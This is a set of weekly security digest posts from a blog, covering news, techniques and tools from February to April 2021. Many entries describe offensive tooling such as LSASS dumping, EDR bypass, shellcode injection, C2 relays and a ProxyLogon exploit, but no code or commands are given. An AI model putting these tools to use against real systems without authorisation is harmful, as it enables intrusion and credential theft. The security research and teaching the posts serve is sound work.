Bad Sector Labs Blog

Last Week in Security (LWiS) - 2021-02-22

By: Erik
23 February 2021 at 04:58

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-02-15 to 2021-02-22.

News

  • Solo V2 — Safety Net Against Phishing. Everyone knows FIDO2 keys are the best defense against credential phishing, but until now all the solutions have been closed source and expensive. Solokey's Solo V2 looks to change all that with an affordable, NFC capable, open source FIDO2 key. I have no affiliation with Solokey - just a fan of what they are doing. Note: the open source firmware has been audited.
  • Sandworm intrusion set campaign targeting centreon systems. In a three year long campaign, Sandworm used webshells and a Linux backdoor to access information technology providers, including web hosting providers. Based on Sandworm's history of targeting industrial control systems, ransomware, and highly public attacks (2018 winter olympics), perhaps this was just an effort to get free redirectors and payload hosting.
  • Brave Browser leaks your Tor / Onion service requests through DNS. This isn't the first issue with Tor and Brave (CVE-2020-8276), and likely won't be the last. Mixing Tor and a standard browser is a recipe for disaster.
  • Clipping Silver Sparrow’s wings: Outing macOS malware before it takes flight. macOS-specific malware, including an ARM-compiled variant, uses the old favorite of a malicious pkg installer to infect victims. Malwarebytes claims it has seen the malware on nearly 30,000 endpoints, while the Red Canary team says it has no evidence the malware has conducted any post-exploitation activities.

Techniques

Tools and Exploits

  • CIMplant is a C# port of WMImplant which uses either CIM or WMI to query remote systems. It allows you to gather data about a remote system, execute commands, exfil data, and more. The tool allows connections using Windows Management Instrumentation, WMI, or Common Interface Model, CIM. CIMplant requires local administrator permissions on the target system. More information in this post.
  • endgame is an AWS pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet. Compared to other AWS offensive tools, endgame has a much wider range of supported services (18 vs 11 for the official AWS Access Analyzer). Of note, the "original" repo (salesforce) and the author's repo (kmcquade) have both been taken down. Sadly, Salesforce has a reputation for this kind of thing.
  • pcp is a command line peer-to-peer data transfer tool based on libp2p. It differs from others (like croc) because it uses IPFS instead of a centralized server.
  • AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests against a Cobalt Strike Malleable C2 profile. Any incoming requests that do not share the profile's user-agent, URI paths, headers, and query parameters will be redirected to a configurable decoy website. More information in the blog post.
  • OffensivePipeline allows you to download, compile (without Visual Studio), and obfuscate C# tools for Red Team exercises.
  • Swift-Attack is the macOS equivalent of atomic red team. It contains unit tests for blue teams to aid with building detections for some common macOS post exploitation methods.
  • SharpLAPS is a C# executable that will retrieve the LAPS password from the Active Directory. It must be executed from either a Domain Administrator or an account with ExtendedRight or Generic All Rights.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • trigen is a Python script which uses different combinations of Win32 function calls in generated VBA to execute shellcode. More information here.
  • horusec is an open source tool that performs static code analysis to identify security flaws during the development process. Currently, the languages for analysis are: C#, Java, Kotlin, Python, Ruby, Golang, Terraform, JavaScript, TypeScript, Kubernetes, PHP, C, HTML, JSON, and Dart. The tool has options to search for key leaks and security flaws in all files of your project, as well as in Git history.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-03-01

By: Erik
2 March 2021 at 04:50

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-02-22 to 2021-03-01.

News

Techniques

Tools and Exploits

  • spraygen is a password list generator for password spraying - prebaked with goodies like sports team names, seasons, years, etc.
  • BadOutlook is a simple PoC which leverages the Outlook Application Interface (COM Interface) to execute shellcode on a system based on a specific trigger subject line. This can be used to build an entire C2 framework that relies on e-mail as a means of communication (where the implant never speaks to the internet directly).
  • 1u.ms is a small set of zero-configuration DNS utilities for assisting in detection and exploitation of SSRF-related vulnerabilities. It provides an easy-to-use DNS rebinding utility, as well as a way to get resolvable resource records with any given contents. A hosted version is available at 1u.ms. You may want to protect the /last and /log endpoints if self-hosting.
  • Alaris is not technically a new tool (LWiS 2020-10-19), but it has had a major update to use direct syscalls with SysWhispers2, a new builder, and new dynamic encryption primitives.
  • redbean - single-file distributable web server. This is both a zip file that contains all content that is served and a truly cross platform (Windows, Linux, MacOS, and BSD) binary webserver. This may be actual magic.
  • Callback_Shellcode_Injection contains POCs for shellcode injection via callbacks. These uncommon API calls are likely much less monitored than standard methods of shellcode injection (although they still use VirtualAlloc).
  • goc2 is a new macOS post exploitation C2 framework. Pairs with goc2-agent.
  • Omnispray aims to replace tools such as o365spray and provide a modular framework to expand enumeration and spraying beyond just a single target/application.

New to Me


  • pillager is designed to provide a simple means of leveraging Go's strong concurrency model to recursively search directories for sensitive information in files. Once pillager finds files that match the specified pattern, the file is scanned using a series of concurrent workers that each take a line of the file from the job queue and hunt for sensitive pattern matches. The available pattern filters can be defined in a rules.toml file or you can use the default ruleset.
  • LsassSilentProcessExit is a new method of causing WerFault.exe to dump lsass.exe process memory to disk for credential extraction via the silent process exit mechanism, without crashing lsass.exe.


Last Week in Security (LWiS) - 2021-03-08

By: Erik
9 March 2021 at 04:04

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-03-01 to 2021-03-08.

News

  • ProxyLogon. The big news of last week was the unauthenticated remote command execution as SYSTEM on Microsoft Exchange servers that only had port 443 open. This bug chain is impressive, and it was originally found by Orange Tsai of DEVCORE, but exploited by an alleged Chinese APT like crazy in the past few weeks. Two things stand out: 1. Orange Tsai and team went from "Let's look at Exchange" to unauth RCE in 3 months, and 2. Somewhere along the discovery and reporting chain, the bug was likely stolen or leaked. While possible, it is unlikely the APT using this 0day discovered it in parallel with Orange Tsai and then started using it only after it was reported to Microsoft. Further speculation is up to the reader - Krebs has a basic timeline of the Exchange mass-hack.
  • Cobalt Strike 4.3 – Command and CONTROL. Industry's favorite commercial command and control framework got an update with a big focus on DNS beacons. While direct support for DNS over HTTPS wasn't included, it is possible to shim it in using lookups to localhost and cloudflared. Full changes in the release notes.
  • Raphael’s Transition. In other Cobalt Strike news, Raphael Mudge is stepping down after nearly a decade of work on Armitage and Cobalt Strike. It's inspiring to see someone take a good idea dreamt up during a CTF and turn it into a successful business. Enjoy your next adventure Mudge, you've earned it!
  • Fast Factoring Integers by SVP Algorithms. I almost didn't include this as the findings have not been demonstrated let alone proven, but "this destroys the RSA cryptosystem" is one hell of a way to end your paper's abstract. I'll be keeping an eye on this one, but don't bump replacing RSA up on your priority list quite yet. Another researcher has implemented the algorithm, and it isn't the RSA destroyer claimed.
  • Xerox lawyers prevent con talk. Sadly this is still a thing in 2021. The researcher found bugs in Xerox multifunction printers and responsibly disclosed them, only to have Xerox sic their lawyer hounds on him. The bug descriptions (no PoCs) are available at Airbus security lab publications.

Techniques

Tools and Exploits

  • universal - This loader provides a unified Go interface for loading shared libraries from memory on Windows, OSX, and Linux. Also included is a cross-platform Call() implementation that lets you call into exported symbols from those libraries without stress. This is a work of art, a universal loader without any C code, or calls to memfd, that even works on the M1 macs. Bravo.
  • Syscall_PE_Loader.cs is a C# PE cradle with DInvoke Syscalls to avoid hooking and sleeps for the DLL imports. Both trigger a scan, so doing only one won't help. Only needs an amsi.dll patch bypass before using to complete the EDR/AV bypass trifecta. However, apparently simply compiling your own unchanged Cobalt Strike artifact kit is enough to bypass defender.
  • SaltStack API vulnerabilities. Just last week we discussed the local SaltStack Minion Local Privilege Escalation, but this is a reprise of the RCE from last year. "It took a few hours total to find these after looking at patches for the last set of vulnerabilities." Patches can be goldmines for finding similar, unpatched bugs!
  • Wubes is like Qubes but for Windows. The idea is to leverage the Windows Sandbox technology to spawn applications in isolation. It currently supports spawning a Windows Sandbox for Firefox.
  • ipv6-df-3.c is a FreeBSD 9 PoC of the SOCK_RAW vulnerability. Why would this matter? The PS4 runs a modified FreeBSD 9 kernel. More information here.
  • CVE-2021-23132 is a Joomla core (<= 3.9.24) vulnerability: com_media allowed paths that are not intended for image uploads, which leads to RCE. This is an authenticated RCE that requires an admin account.
  • EDRs contains information about EDRs and the functions they hook in ntdll.dll that can be useful during red team exercises.

New to Me


  • DT_RPATH. On Linux machines, LD_PRELOAD has been the go-to for userland "rootkits" that hook every process. However, the lesser known DT_RPATH can achieve similar results.
  • packetStrider for SSH is a packet forensics tool that aims to provide valuable insight into the nature of SSH traffic, shining a light into the corners of SSH network traffic where golden nuggets of information previously lay in the dark. Point it at a pcap and it can tell you things like if host keys were ignored, command line flag usage, and if a session was automated or interactive. Very cool.


Last Week in Security (LWiS) - 2021-03-15

By: Erik
16 March 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-03-08 to 2021-03-15.

News

  • ProxyLogon fallout
  • Bloodhound Enterprise. From the creators of BloodHound, a SaaS technology that continuously identifies and quantifies the most critical Active Directory choke points. Measurable, practical remediation guidance enables the elimination of millions of attack paths within your existing Active Directory architecture. The product is scheduled for release this summer (2021) and I am excited to see it help organizations lock down their AD environment.
  • OVH data centre destroyed by fire in Strasbourg – all services unavailable. This is your weekly reminder that the cloud is just someone else's computer. Backups still matter!
  • Introducing sigstore: Easy Code Signing & Verification for Supply Chain Integrity. Let's Encrypt but for code signing. Most importantly: "sigstore will be free to use for all developers and software providers, with sigstore’s code and operation tooling being 100% open source." This is a good step that I hope lots of developers use. Imagine being able to subscribe to a monitor service for all the dependencies in your project. The transparency may also provide an OSINT opportunity for red teams. You can monitor the progress of the tools on GitHub.
  • A Hacker Got All My Texts for $16. A layered network of providers eventually allows the complete re-routing of SMS messages, with no verification or notification to the end user (since fixed by the one provider tested). The fact that 3 separate companies were involved means that there are APIs that allow this with no verification. What would it take for an attacker to either find a new provider that does not do verification or create their own to gain access to the APIs? If a service offers app based (or better, hardware key based) multifactor authentication, choose it over SMS every time.
  • Who Can Find My Devices? Security and Privacy of Apple’s Crowd-Sourced Bluetooth Location Tracking System. This report looks at the closed source tracking system (and the upcoming AirTags) that locates lost devices by using every Bluetooth-capable Apple device as a global sensor, and finds some flaws. However, it's clear that care was taken in the design to preserve privacy more so than other similar systems (e.g. Tile). Don't want to wait for AirTags? Build your own now using openhaystack. Due to the private design of the Apple system, it will be hard (impossible?) to prevent this kind of third party use.
  • Introducing ThreatFox. ThreatFox is a community driven project from the creator of abuse.ch and MalwareBazaar where security researchers and threat analysts can share indicators of compromise (IOCs) with the infosec community for free, and without the need for registration.
  • Whitelist Me, Maybe? “Netbounce” Threat Actor Tries A Bold Approach To Evade Detection. Imagine being so confident in your malware, you email it directly to one of the 2 vendors that have marked you malicious in VirusTotal and ask to be whitelisted. No such luck this time, but how many times has it worked?
  • A Spectre proof-of-concept for a Spectre-proof web. It's pretty wild that the Google team managed to get Spectre working via Javascript in a sandboxed browser, but perhaps the most interesting bit of this post is, "in our tests the attack was successful on several other processors, including the Apple M1 ARM CPU, without any major changes."

Techniques

Tools and Exploits

  • git: malicious repositories can execute remote code while cloning. As someone who clones a lot of git repos, this one is personal. From the advisory: On case-insensitive filesystems, with support for symbolic links, if Git is configured globally to apply delay-capable clean/smudge filters (such as Git LFS), Git could be fooled into running remote code during a clone. Update your git clients! Windows has LFS enabled by default and is vulnerable (other OSs have to enable LFS). This is also not the first git LFS vulnerability (see CVE-2020-27955).
  • Three distinct vulnerabilities discovered by GRIMM while researching the Linux kernel combine as LPE. A kernel pointer leak plus a heap buffer overflow allows for local privilege escalation on modern Linux (RHEL 8.1-8.3).
  • RunDLL.Net is a project to execute .Net assemblies using Rundll32.exe.
  • FOLIAGE. This is an interesting project that implements a DNS-over-HTTPS persistence stager with memory obfuscation a la gargoyle. This project uses NtContinue as the "gadget" which gets around argument limits to manipulate the return address to NtTestAlert() which allows the code to run the next time it is called.
  • DisablePPLDriverPoc is a custom driver to disable protected process light and dump lsass. The driver is not signed, so it must be loaded via a driver signing bypass to work.

New to Me


  • cosmonim is a simple example to show how you can use Cosmopolitan with Nim. Could this be used to write the ultimate cross platform dropper for those cases where an exploit could land you on a Windows or Linux machine?
  • ebpfsnitch is a Linux Application Level Firewall based on eBPF and NFQUEUE. It is inspired by opensnitch and Douane but utilizing modern kernel abstractions - without a kernel module.
  • http_bridge is a client that allows for socks5 proxying over standard HTTP verbs (no CONNECT) through a Linux server running PHP. Similar to Cloak.
  • Go-RouterSocks. Managing multiple chisel sessions can be a pain. This tool exposes a single socks5 proxy port, and allows dynamic routing of networks to specific chisel sessions.


Last Week in Security (LWiS) - 2021-03-22

By: Erik
23 March 2021 at 02:30

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-03-15 to 2021-03-22.

News

Techniques

Tools and Exploits

  • CredBandit. This BOF is the culmination of many great projects, and allows you to dump process memory using direct syscalls and a custom MiniDumpWriteDump adapted from ReactOS, all without having the dump touch disk, transferring it back via a BeaconPrintf hack. Hopefully this kind of workaround won't be required in the next version of Cobalt Strike. It would be great to have a way to send arbitrary data back to a teamserver in a BOF.
  • bloodhound-quickwin is a simple script to extract useful information from the BloodHound + Neo4j combo. It can help to choose a target for follow-on actions.
  • xeuledoc can fetch information about any public Google document (doc, sheet, slide, map, drawing, etc).
  • Lepus3 is a subdomain finder with various API integrations. Learn more in the post: Reviving and Refactoring DNS Enum.
  • Add exploit for CVE-2021-1732. The Windows 10 local privilege escalation vulnerability discovered in the wild is now in metasploit - but nothing is stopping you from modifying this code for use in your own framework/tool.
  • dnsfwd is a DNS forwarder that only forwards queries for the domains you specify to an upstream host. This is useful for things like DNS beacons where you only want to send beacon related traffic to Cobalt Strike.

New to Me


  • grex is a command-line tool and library for generating regular expressions from user-provided test cases. All you do is give it examples of strings to match and it will generate a regular expression that matches all of them. A great tool for getting a good start on a tough regex.
  • CredMaster is a refactored & improved CredKing password spraying tool that uses FireProx APIs (AWS) to rotate IP addresses, stay anonymous, and beat throttling. More details here.
  • SecurityTips is a collection of "HackerScrolls" tips, cheatsheets, and mindmaps.
  • terraformer is a CLI tool to generate Terraform files from existing infrastructure (reverse Terraform): infrastructure to code.


Last Week in Security (LWiS) - 2021-03-29

By: Erik
30 March 2021 at 03:32

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-03-22 to 2021-03-29.

News

Techniques

  • House of Mind - Fastbin Variant in 2021. This post (re)introduces a glibc heap exploitation method that works across all versions of the heap allocator and gives a write-what-where primitive. This is dense exploit development content.
  • APT Encounters of the Third Kind. Easily the best article of the week. Igor goes from noticing a discrepancy between his test setup and production pcap time vs packet counts to uncovering an in-memory only APT backdoor. If you are wondering what a real advanced persistent threat looks like, this is it.
  • SAML XML Injection. If you're testing an app with SSO abilities based on SAML, be sure to read this post.
  • PhishCatch: Detecting password reuse from the inside out. By hashing enterprise passwords and storing only the hashes locally, then hashing every submitted password for comparison, this Chrome extension can detect password reuse without compromising any credentials.
  • Recovering a full PEM Private Key when half of it is redacted. In just a few hours the wizards of the cryptohack Discord server managed to recover a RSA private key from a partially redacted screenshot. "Whether it’s a single bit leaking with Ladder Leak, or pieces of primes for a Coppersmith attack, partial information exposure of cryptographic private keys is often enough to totally break the crypto protocol. If you find something private, keep it that way."
  • Bypassing conditional access by faking device compliance. This guide shows two different ways to make a device compliant in Microsoft Intune, even if you spoof it as a Commodore 64.
  • Dumping LSASS in memory undetected using MirrorDump. Using boo and avoiding the classic dumping technique of calling OpenProcess, MirrorDump instead registers as a "legitimate" authentication provider with Windows and uses a handle to itself (lsass.exe) to do the dumping.

Tools and Exploits

New to Me


  • graphtage is a command-line utility and underlying library for semantically comparing and merging tree-like structures, such as JSON, XML, HTML, YAML, plist, and CSS files. This is sure to be useful in a shell script at some point.


Last Week in Security (LWiS) - 2021-04-05

By: Erik
6 April 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-03-29 to 2021-04-05.

News

  • Phone numbers for 533 million Facebook users leaked on hacking forum. The data is from a 2019 scrape that abused the contact import feature, and has been circulating in private since then. Now however, anyone who knows your name can look up the phone number used to register your facebook account.
  • Whistleblower: Ubiquiti Breach “Catastrophic”. Despite the initially downplayed public statement in January, an insider claims the attacker "gained root administrator access to all Ubiquiti AWS accounts, including all S3 data buckets, all application logs, all databases, all user database credentials, and secrets required to forge single sign-on (SSO) cookies." Ubiquiti has since issued a new statement that did not dispute any of the facts and hinted the perpetrator may have been an insider, or "an individual with intricate knowledge of our cloud infrastructure."
  • Our reasoning for Outflank Security Tooling. Outflank, a well known top-tier adversary simulation firm out of the Netherlands, is offering its in-house offensive toolset for a yearly license of €40,000. I agree with their thesis that effective red teams now have to be excellent developers/R&D practitioners and that was not the case 5 or more years ago. Hopefully this business model is sustainable - I think it will be. More details on the product page.
  • Update on campaign targeting security researchers. The North Korean actors that targeted security researchers with malicious project files in January 2021 have stood up a new potential watering hole. In this case, Google's Threat Analysis Group was able to notice before the site could host any malicious content.
  • Google LLC v. Oracle America, Inc. "The Court ruled that Google's use of the Java APIs was within the bounds of fair use, reversing the Federal Circuit Appeals Court ruling and remanding the case for further hearing." While it isn't a total victory (it didn't rule that APIs couldn't be copyrighted), it's still a win.
  • Community API. Greynoise has been a useful tool for SOCs to determine if the traffic they are seeing is legitimate attacks or just noise like known scanners. Now there is a free to use community API!

Techniques

  • How to execute an object file: Part 2. This post picks up where the last one left off and expands the loader to handle static constant data and global variables.
  • Man in the Terminal. On Linux or macOS targets, PATH variable manipulation can allow your program to be executed before the actual program the user invokes, allowing you to shim it and retrieve credentials and other sensitive information. A proof of concept shim called cliProxy is available. A simple improvement would be for cliProxy to automatically detect the program it is invoked as and search the real PATH for that binary to proxy. That way you could compile once, and deploy for many target binaries.
  • HookDump. By using LoadLibrary and reading the DLL from disk, HookDump can compare the exported functions to detect hooks with low (or no?) false positives. Grab the code on GitHub.
  • Safe code & pitfalls: DLL side-loading, WinAPI and C++. DLL side-loading is a common persistence technique, but it can be difficult to write the "remediation" section of a report that finds usable DLL side-loading on an app assessment. This is the best blog I have found that provides technical details on how to prevent side-loading in C++.
  • Three ways of using MSBuild to beat CrowdStrike. MSBuild has been a favorite LOLBin for years now, and it still is undetected in many cases!
  • The Power of SeImpersonation. Just when you thought there couldn't possibly be any more potato exploit variants another one drops. This new variant focuses on the ability to respond to HTTP requests or named pipe write. The code is available as GenericPotato.
  • This man thought opening a TXT file is fine, he thought wrong. macOS CVE-2019-8761. TextEdit is the notepad.exe of macOS and it will render HTML for you without asking. Using some iframedoc and style magic, even without JavaScript Paulos is able to exfil data. Impressive work! I always run defaults write com.apple.TextEdit RichText -bool false on a new mac to prevent the rich text rendering anyway; now it's a security hardening feature.
  • PageBuster: stealthily dump all the code ever executed. This tool can dump all executable pages from memory which is great for things like analyzing packed malware in a sandbox vs reverse engineering the packer and unpacking it by hand.

Tools and Exploits

  • PMapper is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for privilege escalation and for alternate paths an attacker could take to gain access to a resource or action in AWS.
  • random_c2_profile is a project designed to generate malleable c2 profiles based on the reference profiles here. This makes totally random profiles, so you may want to manually make it less random.
  • WordlistSmith is a tool to quickly scrape a website and generate a wordlist and is multithreading capable.
  • CheeseRDP is a single C# binary that can be run via .NET Reflection and will inject into mstsc.exe to steal RDP credentials. No need to drop a DLL to disk!
  • SharpProxyLogon is a fully featured exploit for ProxyLogon (the Exchange RCE chain) that can either drop a webshell or inject shellcode into svchost.exe as SYSTEM.
  • X-Commander is an easy-to-use python tool for attacking MySQLX or XDevAPI, brute forcing and querying.
  • innernet is a private network system that uses WireGuard under the hood. While WireGuard is awesome, it's just a really good VPN and nothing more. Innernet looks to solve some of the comfort issues with WireGuard. The announcement blog post has the details.

New to Me


  • caronte is a tool to analyze the network flow during capture the flag events of type attack/defense. It reassembles TCP packets captured in pcap files to rebuild TCP connections, and analyzes each connection to find user-defined patterns.


Last Week in Security (LWiS) - 2021-04-12

By: Erik
13 April 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-04-05 to 2021-04-12.

News

Techniques

  • BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution. Yes, it's as crazy as it sounds. Be sure to check out the demo. These kinds of exploits (zero-click network subsystem exploits) always amaze me.
  • Deanonymizing LinkedIn Users. This is a great OSINT article that shows how you can leverage LinkedIn to discover personal emails for individuals (useful in credential stuffing and phishing targeting). The API is limited to 1,000 requests every two days.
  • Do You Really Know About LSA Protection (RunAsPPL)? This article dives into the details of Protected Process Light, how it works, how it can be bypassed, and what the different PPL levels mean.
  • HTML Maldoc Remote Macro Injection. Remote macros are useful to bypass mail scanning or other detection techniques that do not "detonate" the document. While it has been shown effective with .docx, this is an interesting use case with HTML documents.
  • Detecting Exposed Cobalt Strike DNS Redirectors. You are (hopefully) using HTTPS redirectors, but what about DNS redirectors to mask your C2 server's fingerprints? dnsfwd (LWiS 2021-03-22) would do nicely.
  • Attack Surface Reduction is a collection of research into Microsoft's Attack Surface Reduction rules. They are implemented in Lua, and the decompiled rules give lots of great information about easy things that instantly get marked "clean."
  • Handling “Open File – Security Warning”. The SEE_MASK_NOZONECHECKS environment variable is a new one to me, and it prevents the security pop up seen on downloaded files ("mark of the web"). While this won't help with your initial payload (that I can think of), it could be useful for follow on actions.
  • DInvoke to defeat EDRs. If you aren't using DInvoke with your C# you are missing out on all kinds of fun. This presentation walks through some of the existing research and packages it up nicely.

Tools and Exploits

  • CVE-2021-24086 is a proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability"), a NULL dereference in tcpip.sys patched by Microsoft in February 2021. It is triggerable remotely by sending a malicious UDP packet over IPv6. If you can reach an unpatched Windows machine with UDP over IPv6, you can bluescreen it. Put this one in the "demonstrate impact" folder and ensure your lawyer has reviewed whatever memo you got signed to allow its use on a customer.
  • chrome "0day". It's really a 1day as the Chromium source has been patched but the patch hasn't been pushed to a release yet. It won't pop calc without the --no-sandbox flag, so bring your own sandbox escape!
  • kiterunner is a "contextual content discovery tool" that uses traditional content discovery (throw a wordlist and look for non-error code responses), as well as more tailored requests with specific methods, headers, and parameters curated from multiple sources. More information at the assetnote blog.
  • TiEtwAgent is a PoC memory injection detection agent based on ETW, for offensive and defensive research purposes. Use this in your lab to see if your fancy tools can defeat kernel-mode detection!
  • dll-exports is a collection of DLL function export forwards for DLL export function proxying. This is great for stealthy Windows persistence.
  • cook is a customizable wordlist and password generator. It allows you to define word parts and patterns and generates all combinations - and the readme has beautiful usage pictures!

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-04-19

By: Erik
20 April 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-04-12 to 2021-04-19.

News

  • PoshC2 – Introducing Native macOS Implants. As more businesses adopt macOS, red teamers have started to build tooling to support engagements against them.
  • NSA says it found new critical vulnerabilities in Microsoft Exchange Server. Like many big bugs, once one is exposed lots of researchers take aim. Exchange is the latest target, falling at the recent Pwn2Own and now having multiple vulnerabilities reported by the NSA. How many more remain unreported?
  • FBI Accesses Computers Around Country to Delete Microsoft Exchange Hacks. The warrant and its attachments authorize "the use of remote access techniques to search the electronic media" of the targeted Exchange servers. While it also states that it does not authorize any seizure or copying of content (besides the webshells themselves) and no alteration of functionality, the FBI still had access to your mail server. I suppose it's a good idea to patch to keep everyone out, not just the "bad guys."
  • research-threats is a collection of legal threats against good faith security researchers (vulnerability disclosure gone wrong) and is a continuation of work started by @attritionorg. Hopefully it will encourage companies to act better toward researchers trying to help them.
  • Did Someone at the Commerce Dept. Find a SolarWinds Backdoor in Aug. 2020? This is an interesting post that also brings up blue team OPSEC. While VirusTotal and other similar services are great, what are you telling the world by uploading samples with accounts or information that tie back to your organization?
  • Policy and Disclosure: 2021 Edition. Google Project Zero is often used as an example of how to do responsible disclosure, and they have taken that role seriously. In 2021 they are implementing a "90+30" model that gives a 30 day grace period after a bug is fixed within 90 days to allow better patch adoption before technical details are released. As N-day authors get faster and faster, this grace period becomes more important.
  • NAME:WRECK Breaking and fixing DNS implementations. Many IoT and industrial control OSes have bad DNS implementations. So bad, in fact, that you can get remote code execution with a specially crafted DNS response. This exploit requires an attacker to be able to respond to DNS requests - some form of man-in-the-middle.
  • Codecov Bash Uploader Dev Tool Compromised in Supply Chain Hack. The year of the supply chain attack is well underway. This one targets a tool developers use to generate code coverage often used in CI. Who is affected? Lots of projects.

Techniques

Tools and Exploits

  • Finding Metasploit & Cobalt Strike URLs. The great forensic tool creator Didier Stevens has a new script to find likely Metasploit or Cobalt Strike 8-bit checksums. Don't stage your payloads if you are worried about OPSEC. The tool is available here.
  • SSD Advisory – OverlayFS PE. Ubuntu 14.04-20.10 were vulnerable to an issue with file capabilities (think setuid-bit, but slightly different) where an OverlayFS could set arbitrary capabilities on files in an outer namespace/mount. A full exploit is included.
  • MineSweeper is a lightweight (17-18kb) binary for Windows user-land hook manipulation. This will be useful for EDR research.
  • macOS Post-Exploitation
    • JXA_Proc_Tree is a JXA script for enumerating running processes, printed out in a json, parent-child tree. For use with a macOS JXA agent (i.e. Mythic).
    • Add-To-TCC-DB is a JXA script that leverages sqlite3 API calls to add items to the user's TCC (Transparency, Consent, and Control) database.
    • PrintTCCdb is a JXA script for Mythic that prints the TCC.db.
    • Persistent-Swift is a Swift port of some of the original PersistentJXA projects by D00MFist. Original PersistentJXA repo.
  • Invoke-Stealth is a Simple & Powerful PowerShell Script Obfuscator. This tool helps you to automate the obfuscation process of any script written in PowerShell with different techniques. You can use any of them separately, together or all of them sequentially with ease, from Windows or Linux.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • pyMalleableC2 is a python interpreter for Cobalt Strike Malleable C2 Profiles. It allows you to parse, build and modify them programmatically. Unlike other simple parsers, this one actually uses an abstract syntax tree and should handle complex profiles much better.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-04-26

By: Erik
27 April 2021 at 23:25

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-04-19 to 2021-04-26.

News

  • Ill-advised research on Linux kernel lands computer scientists in hot water. Researchers from the University of Minnesota purposely introduced bugs into the Linux Kernel as part of a study on the potential to introduce bugs into open source projects. I'm not sure why this was necessary, as plenty of real bugs that turn out to be exploitable are already committed to open source projects, including the Linux kernel. Linux maintainers responded, appropriately, by banning any contributions from a University of Minnesota email account. The researchers have issued an open letter to the Linux community, but the damage has been done.
  • Security Incident Disclosure (Brew). Due to a way the Brew project's (package manager) GitHub actions were configured, it was possible to hide code from git_diff which would trick the auto-merge action into thinking only the version number was updated. This would allow an attacker to add malicious code to any Brew package without any human review. The issue has been fixed by disabling the automerge action as well as other steps including manual review.
  • Computer security world in mourning over death of Dan Kaminsky, aged 42. A star in the infosec community, Dan most famously worked to fix multiple DNS implementations vulnerable to cache poisoning, gave multiple Blackhat and DEF CON talks, and was generally just a good person. His loss at a young age (due to diabetic ketoacidosis) is a reminder to step away from the keyboard and enjoy life.
  • tmp.0ut Volume 1 is an homage to classic hacker zines packed full of great ELF knowledge.
  • Google Chrome DNS Security Bypass. A Chrome "feature" called Async-DNS will perform DNS lookups to Google's DNS servers regardless of how the host is configured. This post also includes ways to disable this on Windows and macOS (add the --disable-async-dns flag to the command line), as it could prevent DNS based defenses or logging. If you rely on an internal DNS server, blocking UDP 53 outbound on your firewall is a temporary solution until Google starts using DNS-over-HTTPS for this "feature." Switching to Firefox is a permanent solution.
  • REvil gang tries to extort Apple, threatens to sell stolen blueprints. Two interesting pieces of this story: the stolen blueprints seem to confirm Apple's plans to add more ports and remove the Touch Bar (all power users are happy about this), and the ransom is requested not in Bitcoin but in a much lesser known cryptocurrency called Monero, which has true privacy.
  • Project Jengo Redux: Cloudflare’s Prior Art Search Bounty Returns. Patent trolls are a symptom of a broken patent system, but Cloudflare's response to them is fantastic. A $100,000 bounty to invalidate the patents used by the trolls is a solution that can have a positive outcome for Cloudflare and generate some publicity about this flaw in the patent system.
  • clickstudios Passwordstate Incident Management Advisory #01. Supply chain attacks are here to stay, and what better software to hijack an update for than a password manager? Any critical systems should be protected by FIDO2 (U2F) hardware tokens. FIDO2 keys are a one-time investment that can save untold amounts of damage later on.
  • Exploiting vulnerabilities in Cellebrite UFED and Physical Analyzer from an app's perspective. Despite the questionable cryptocurrency moves, Signal proves it still has edge with this shade-ridden post about possibly, maybe, definitely including some Cellebrite parser 0days in a random selection of Signal users' devices. Interesting to see if this plays out in court with evidence rejected as it may have been tampered with or deleted by one of these exploits. Is it enough to cast doubt on any user's Signal data collected with Cellebrite?

Techniques

Tools and Exploits

  • CertStealer is a .NET tool for stealing and importing certificates in the Windows certificate store without touching disk. Useful for red team operations where you need to poach a certificate for pivoting purposes and want to do so with an in-memory post-ex payload.
  • SharpNoPSExec is a fileless lateral movement tool that queries all services and randomly picks one with a start type of disabled or manual, a current status of stopped, and LocalSystem privileges, in order to reuse it. Once it selects the service it saves its current state, replaces the binary path with the payload of your choice and executes it. After waiting 5 seconds it restores the service configuration.
  • Meet EDD - He Helps Enumerate Domain Data. EDD is a .NET tool to enumerate Windows domain data, designed to be similar to the now unmaintained PowerView.
  • PPLdump is a tool that implements a userland exploit that was initially discussed by James Forshaw (a.k.a. @tiraniddo) - in this blog post - for dumping the memory of any PPL as an administrator.
  • AsIo3Unlock is a proof-of-concept bypass of the pseudo-security caller check implemented in AsIO3, "unlocking" this driver for usage with FULL R/W access.
  • fakemeeting is a tool for creating fake meeting invites. More details here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • STFUEDR. Everyone knows that userland hooks can be defeated, but some EDRs use drivers and kernel hooks. This project uses a driver signing bypass to defeat even those hooks!

This post is cross-posted on SIXGEN's blog.

